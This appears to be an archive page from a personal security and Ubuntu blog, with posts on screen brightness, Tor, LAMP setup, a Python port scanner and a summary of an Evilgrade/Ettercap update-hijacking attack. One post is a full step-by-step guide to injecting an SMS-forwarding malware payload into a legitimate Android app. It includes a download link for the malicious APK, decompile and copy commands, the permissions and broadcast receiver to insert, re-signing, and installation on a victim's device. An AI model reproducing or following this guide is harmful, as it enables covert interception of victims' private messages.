Information Security, Web, Networks and Systems

Thursday, December 19, 2013

Deep Dive into Tor - Introduction

TOR, The Onion Router in long terms, is a world well known Anonymous Network which provides users browse internet 'Completely' anonymous. Highlighting the word 'Completely' I don't say that nobody will ever know who you are and what you say in the internet through Tor. I will later describe some situations in which this 'Completely' term 'Completely' breaks.

Sunday, September 8, 2013

Sniff Public Traffic with Wireshark Monitor Mode and BroadCom Wirelesscard in Ubuntu

In this post I'll show you how to sniff packets with Wireshark Monitor mode in Ubuntu. First of all you need to check what wireless driver you have installed in your computer. In my case in ubuntu 13.04, you can check your driver installation at Additional Drivers.

Thursday, September 5, 2013

Change Screen Brightness in Ubuntu Terminal

11:35 AM Posted by Deepal , , , , No comments
I had a problem in my HP pavilion G6 Laptop with brightness change. I could not change the brightness using my function keys. Though I could change brightness by the Brightness & Lock settings, lowest brightness level was too bright for me. So I used following method to reduce the brightness.

    sudo -s
    nano /sys/class/backlight/intel_backlight/brightness

(In my case it was intel_backlight. This may change from computer to computer.) Edit the value of the file. In my case, the value was about 4000. So I reduced it to 800 and saved. Then the brightness was reduces. You can reduce the brightness into any level by just editing this file.

If you want to reduce the brightness at every startup, include following command in /etc/rc/local file.( /etc/rc.local file is executed at the end of every startup. If you put a command there, you can run that command at every startup)

    echo 800 > /sys/class/backlight/intel_backlight/brightness

Restart your computer and you'll see your command is effective.

A little more fun :


I created a small shell script (.sh) to reduce my brightness to any amount at any time easily. But for this script I would have changed the brightness using the entire command given above. This shell script made it easy. I just needed to execute the shell script and pass brightness value as a command line parameter as follows.

./brightness 600

Here is my shell script:

    #!/bin/sh
    echo $1 > /sys/class/backlight/intel_backlight/brightness
    echo "[+] Brightness set to $1n"

Android Malware Injection into Original Apps

In this post I am going to describe how malicious apps can be injected into an original apps using UBUNTU. For this post I have created a small malicious app which intercepts incoming SMS and fowards to another person without victim  knowing when message receives. You need to have following files to do this:
APKtool (for WIndows, you may need to download a windows version of apktool here)
SignAPK.jar + keys
Malicious SMSHacker.apk app

You can download all these stuff with this link;
http://www.mediafire.com/folder/64dsan4mpnxdu/appinjection

Here is a rough sketch of our process to do this..
Decompile the original android app (.apk) using apktool
Decompile the malicious android app (SMSHacker.apk) using apktool
Inject decompiled malicious app's files(Copy malicious files into) into decompiled original app
Inject permissions in the malicious apk file's AndroidManifest.xml into original file's AndroidManifest.xml
Recompile the infected original app using apktool
Sign the recompiled app using signapk.jar
Install recompiled-signed apk file into victim's device
Let's follow the listed steps;

Step 1:

    Download all files I have given in the above mediafire link. I have included all required files including sample SMSHacker app to test. And copy all files into a single directory.

Copy your apk file into which you need to inject SMSHacker into the same directory. You can keep your apk file in your own directory, but you need to mention the path to it explicitly in the following step.

Open a terminal and go to that directory. Run following command to decompile your original apk file(Android App). Lets say your original apk filename is myapp.apk;

./apktool d myapp.apk MyAppDec

In this above command 'd' switch means you are decompiling myapp.apk file. With 'MyAppDec', you mention include decompiled app in a directory named 'MyAppDec' in the same folder.

Step 2:

Now decompile your malicious file too (SMSHacker.apk);

./apktool d SMSHacker.apk SMSHackerDec

Then you'll see two directories called SMSHackerDec and MyAppDec in the same folder in which decompiled files are included.

Step 3:

If you browse into these folders, you'll note that there is a folder called smali in both the decompiled app folders. This smali folder includes all decompiled files from the apks. When you decompile an apk, they are decompiled into a file type called .smali. Now go into the folder which include all smali files of the malware (SMSHacker) with this command.

cd /SMSHackerDec/smali/com/sms/smshacker/

Then open SMSHacker.smali file in gedit.

gedit SMSHacker.smali

I created this malware and tested on emulators. So I have set the sms fowarding mobile number as '5554'. You can change it to your own one and let all receiving messages of victim be fowarded to your own number. So search for the string '5554' in the SMSHacker.smali file and replace it with your preferred number. (say your backup phone :D).

Now copy these malicious files into decompiled original app's files.

cd ../../../../../;
cp SMSHackerDec/smali/com/* -R MyAppDec/smali/com/;

Then you have injected files into the original folder. Now we need to inject required permissions from the SMSHacker's AndroidManifest.xml file into the original file's AndroidManifest.xml file.

Step 4:

Open SMSHacker's AndroidManifest.xml file in gedit.

gedit SMSHackerDec/AndroidManifest.xml

You'll see three lines in the file like these.

<uses-permission android:name="android.permission.RECEIVE_SMS" />
<uses-permission android:name="android.permission.SEND_SMS" />
<uses-permission android:name="android.permission.READ_PHONE_STATE" />

Actually we do not need the 3rd permission for this sake. So copy first two lines into the MyAppDec/AndroidManifest.xml file before <application> tag.

And also you might see few lines like followings inside the malicious file's AndroidManifest.xml

<receiver android:name="com.sms.smshacker.SMSHacker">
    <intent-filter>
        <action android:name="android.provider.Telephony.SMS_RECEIVED" />
    </intent-filter>
</receiver>

Copy this part into MyAppDec/AndroidManifest.xml within <application> tag and before  first <activity> tag.

Now save  MyAppDec/AndroidManifest.xml file and close gedit.

Now we have succesfully injected files and permissions. Now we can recompile the new app using apktool.

Step 5:

Go to the directory where apktool and other files exist and run apktool to recompile the app.

./apktool b -f MyAppDec myhackedapp.apk

This 'b' switch means build and '-f' switch means 'force'. This '-f' neglects any file changes in the apk file and compile it without any issues.

After running that command you'll see a new myhackedapp.apk file inside the same folder.

Step 6:

We need to sign that app using signapk.jar before installation. This signing task is important before installation since you cannot install an app on a device or an emulator without signing it.

Sign your apk file using following command.

java -jar signapk.jar testkey.x509.pem testkey.pk8 myhackedapp.apk myhackedapp-signed.apk

You'll see your signed apk file named myhackedapp-signed.apk.

Now we are done. We can install this apk file in any device and let victim execute the malicious code.

This SMSHacker.apk is actually an app with a Broadcast receiver. What it does is, when a message is received it gets invoked and executes the code inside its handler. I have included code to foward message to another phone inside the handler. We need to include <receiver> information inside the AndroidManifest.xml file to get this to work. That's why we injected <receiver> information from the malicious manifest file into the original manifest file. And also we require permissions to read an incoming messge and send a sms. So we injected permissions to read sms and send sms in original app's manifest. 

When installed, this would be visible as a normal app in victims device, and when victim runs the app for the first time receiver starts. After that if victim closes the original app the receiver continues listening for incoming sms.

I have included this in a module in the Android Exploitation Framework I am currently developing for a project. In that framework, one can use many types of payloads to inject to any original app.

Thanks for reading and if there are any issues, post a comment below.

Wednesday, September 4, 2013

Fix Issues in ATI Radeon Graphics - Ubuntu 13.10 and earlier

1:42 PM Posted by Deepal , , , No comments
If you are using radeon graphics or any other dedicated AMD graphics card with Intel Graphics in your laptop, you might have encountered a problem of overheating and lesser battary life. If you are using Ubuntu 13.04 or an earlier version, you can shut down AMD graphics card permanently and let Intel Graphics card work and solve these two problems. But if you are using Ubuntu 13.10 (on the day of this writing, latest ubuntu version is 13.10), you can install AMD Radeon drivers including Catalyst Control Center since Ubuntu 13.10 now supports ATI Hybrid Graphics.

Install and configure LAMP Server and PhpMyAdmin on Ubuntu

12:26 PM Posted by Deepal , , , , No comments
Hello all, As my first post in my Ubuntu blog I am going to describe how to install and configure Apache web server in ubuntu. Most tutorials found on internet either describes how to install Apache web server or how to install PHPmyadmin on ubuntu. In this tutorial I'll describe how to install Apache web server using LAMP (Linux version of WAMP as you may know), install PhpMyadmin and configure it to work in coperation with Apache and discuss some frequently asked questions on working with Apache on ubuntu.

Saturday, July 13, 2013

Prevent Windows 8 automatically delete thumbnail cache

Its really annoying in Windows 8, everytime we go to a folder which contains hundreds of images or video files, image/video thumbnails are started appearing and we see the green bar is loading in the address bar. This is really annoying and in my case this lead to Windows explorer not responding situations and even restarting windows explorer. This is an issue in windows 8 which does not keep thumbnail cache for a long time. It automatically deletes thumbnail cache and thumbnails are rebuilt when a user browse to a folder containing files/sub folders. It is a simple way to prevent this automatic deletion.

Wednesday, July 3, 2013

Hacker's Python 3 - Multi Threaded TCP Echo server in Python

I have created a simple Multi - Threaded ECHO server in python. We can create it using python's socket and threading modules. This server listens for port 9999 of all interfaces.When started this server runs with a single thread and listens for an incoming connection. When a client tries to connect, this server creates a new thread to handle that connection. So multiple clients can communicate with the server with each client corresponds to a particular thread of the server.

Monday, July 1, 2013

Saturday, June 29, 2013

Evilgrade - Ettercap - Metasploit - Malware Injection into SoftwareUpdates

In this post I am going to describe how Evilgrade can be used with the combination of Ettercap for an amazing attack. Evilgrade is a tool free shipped with Backtrack 5 OS as same as Ettercap. This tool can be used to inject malware into a victim's machine while a software update download is happenning. This is also called a Man In The Middle Attack. When this attack is going on, victim downloads an update for a software in his computer but actually a malware is being downloaded with the face of a legal software update. Natural thing is once a software update is finished downloading, it executes and updates the software. But in this case, its the malware which was downloaded and it gets executed by the software after being downloaded. Finally the victim's computer gets infected.

Hacker's Python 2 - Multi-threaded Port Scanner

12:12 AM Posted by Deepal 4 comments

    I have created a multithreaded port scanner using python. Following is the code of my program. I ran the script in ubuntu. I will describe the meaning of each function and code snippet later in this post.

Download Source Code 

#!/usr/bin/env python
#this is the multithreaded port scanner

import socket, threading, thread

class PortScanner(threading.Thread):
    openportcount = 0
    
    def __init__(self, hostname, portrange):
        threading.Thread.__init__(self)
        self.hostname = hostname
        self.portrange = portrange
        
    def run(self):
        while True:            
            for port in range(self.portrange[0],self.portrange[1]):
                sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                status = sock.connect_ex((self.hostname,port))
                print status
                if status == 0:
                    #print "from thread %s"%str(threading.current_thread().name)
                    print "open\t%d"%port
                    PortScanner.openportcount+=1
                    sock.close()
                else:
                    pass
            
            thread.exit()
            


def main():
    print "[*] Starting Port Scanner....\n"
    hostname = raw_input("[?] Host name for port scanning : ")
    portrange = list((raw_input("[?] Port range : ").split("-")))
 
 
    lport = int(portrange[0])
    uport = int(portrange[1])
    
    if lport>uport:
        tempport = uport
        uport = lport
        lport = tempport
    
    if uport > 65535:
        uport = 65535
        print "[!] Port must be 0-65535\n[!] Port range set to %d - 65535\n"%lport
    elif lport < 0:
        lport = 0
        print "[!] Port must be 0-65535\n[!] Port range set to 0 - %d\n"%uport
    

    no_of_threads = int(raw_input("[?] No of threads : "))
  
    r = (uport - lport)/no_of_threads
    
    print "\n[+] %d Threads starting...\n"%no_of_threads
 
    threads = []
    for i in range(1,no_of_threads+1):
        uport = lport + r+ 1
        if uport>65535:
            uport=65535
        ports = [lport, uport]
        thread = PortScanner(hostname, ports)
        lport = uport+1
        thread.start()
        threads.append(thread)
    
    for t in threads:
        t.join()
        
    print "\n%d open ports found!"%PortScanner.openportcount
    print "\nDone!"
        
        
if __name__ == "__main__":
    main()
    
   
Functionality in brief

This program uses python's "socket","threading" and "thread" modules. Using socket module, this script tries to establish a connection to each port in the port range in the given host. If the connection can be established to a port, this program detects that port as an open port. Otherwise that port is discarded as a closed port.

Multithreading

  Once the user gives a port range to scan and number of threads for scanning, this program devides the port range into equal sized sub-ranges and assigns them to each thread. Following code illustrates that functionality.

    
    r = (uport - lport)/no_of_threads
    #some other code
    threads = []
    for i in range(1,no_of_threads+1):
        uport = lport + r+ 1
        if uport>65535:
            uport=65535
        ports = [lport, uport]
        thread = PortScanner(hostname, ports)
        lport = uport+1
        thread.start()
        threads.append(thread)

In the PortScanner class which extends Thread class in threading module, "run" function defines the port scanning functionality.

    def run(self):
        while True:            
            for port in range(self.portrange[0],self.portrange[1]):
                sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                status = sock.connect_ex((self.hostname,port))
                print status
                if status == 0:
                    #print "from thread %s"%str(threading.current_thread().name)
                    print "open\t%d"%port
                    PortScanner.openportcount+=1
                    sock.close()
                else:
                    pass
            
            thread.exit()

In each thread, the port range assigned to it is scanned. I have used the functions connect_ex() to check whether a connection can be established to that port.

Note:-
socket module contains two functions that are used for establishing a connection. One is connect() function and the other is connect_ex() function. connect() function tries to connect to a particular host:port and if fails it raises an exception. How connect_ex() differs from connect() is that, connect_ex() returns integer 0 if a connection can be successfully established. Otherwise it returns a value other than 0. So for the ease of programming, I have used connect_ex() function.



There may be some performance improvements for this code, but I hope this should be useful for you as a beginning to more complicated python scripting. Comments are welcome. :)

Friday, June 28, 2013